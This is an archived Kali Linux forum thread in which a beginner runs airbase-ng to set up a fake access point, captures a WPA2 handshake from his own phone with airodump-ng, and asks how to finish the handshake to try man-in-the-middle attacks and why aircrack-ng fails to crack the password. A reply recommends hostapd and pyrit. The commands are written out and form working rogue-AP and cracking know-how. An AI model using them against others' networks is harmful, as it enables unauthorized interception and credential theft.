PDA

View Full Version : How can i accept a handshake with airbase-ng


elidd1
2015-07-30, 22:45
Hi all,
let me for start by saying, yes i am a noob to Kali and all its' wonderful and mystical tool.. and perhaps i have watched too many episodes of Mr. Robot. that said, i have been playing with airbease-ng, airmon-ng, and airodump-ng and having a wonderful time.

Recently i conducted an experiment where i created a fake ESSID called "freeboobs" like so:

airbase-ng -a AA:AA:AA:AA:AA:AA -e "freeboobs" -c 6 -W 1 -Z 4 wlan1mon


in a second terminal window i started an dump like so:

airodump-ng -c 6 --output-format pcap -w /root/fakeboobs wlan1mon


I then went over to my phone, and looked for the "freeboobs" network.. there it was! and who doesn't want to connect with 'freeboobs'... so i connected using the password "iloveyou" as i knew it existed in my wordlist 'rockyou.txt'

soon enough i got the two terminal windows to output the following:


root@kali:~# airbase-ng -a AA:AA:AA:AA:AA:AA -e "freeboobs" -c 6 -W 1 -Z 4 -V 3 wlan1mon
18:14:11 Created tap interface at0
18:14:11 Trying to set MTU on at0 to 1500
18:14:11 Access Point with BSSID AA:AA:AA:AA:AA:AA started.
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"
18:14:17 Client 84:7A:88:5D:0D:DB associated (WPA2;CCMP) to ESSID: "freeboobs"


and...


CH 6 ][ Elapsed: 1 min ][ 2015-07-30 18:15 ][ WPA handshake: AA:AA:AA:AA:AA:AA

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

AA:AA:AA:AA:AA:AA 0 15 976 509 0 6 54 WPA2 CCMP PSK freeboobs


My question is two part..

1. The phone failed to connect.. it said "authenticating" and then never got authenticated.. i guess this is expected, but is it possible to fake the final part of the hand shake and allow the phone to be connected, so i can explore possible MitM attacks?

2. after i stopped the airodump, i ran cowpatty and got a succes ::


root@kali:~# cowpatty -r '/root/fakeboobs-02.cap' -c
cowpatty 4.6 - WPA-PSK dictionary attack. <[email protected]>

Collected all necessary data to mount crack against WPA2/PSK passphrase.

but i have been running aircrack:

aircrack-ng -w /root/rockyou.txt fakeboobs-02.cap

knowing that the password i entered, 'iloveyou' is early in the list, and it is still going for about 2 hours now.. is it possible that it won't crack the password even though it's in the list? if so why?

UPDATE:: it did not crack the password after three hours, so i ran the script again, insuring that i used "iloveyou" as the password and using a txt file that only has 'iloveyou' it did NOT crack the password

any ideas why?

thanks for helping me learn

elidd1
scorpius
2015-08-05, 17:59
1. Your phone will never really authenticate when using airbase-ng, you will have to use something like hostapd.
2. Aircrack-ng does not always find the password because the handshake may be malformed, or not complete, or out of sequence. The best tool is pyrit with the --all-handshakes option. It always finds the password unless your handshake is really corrupt.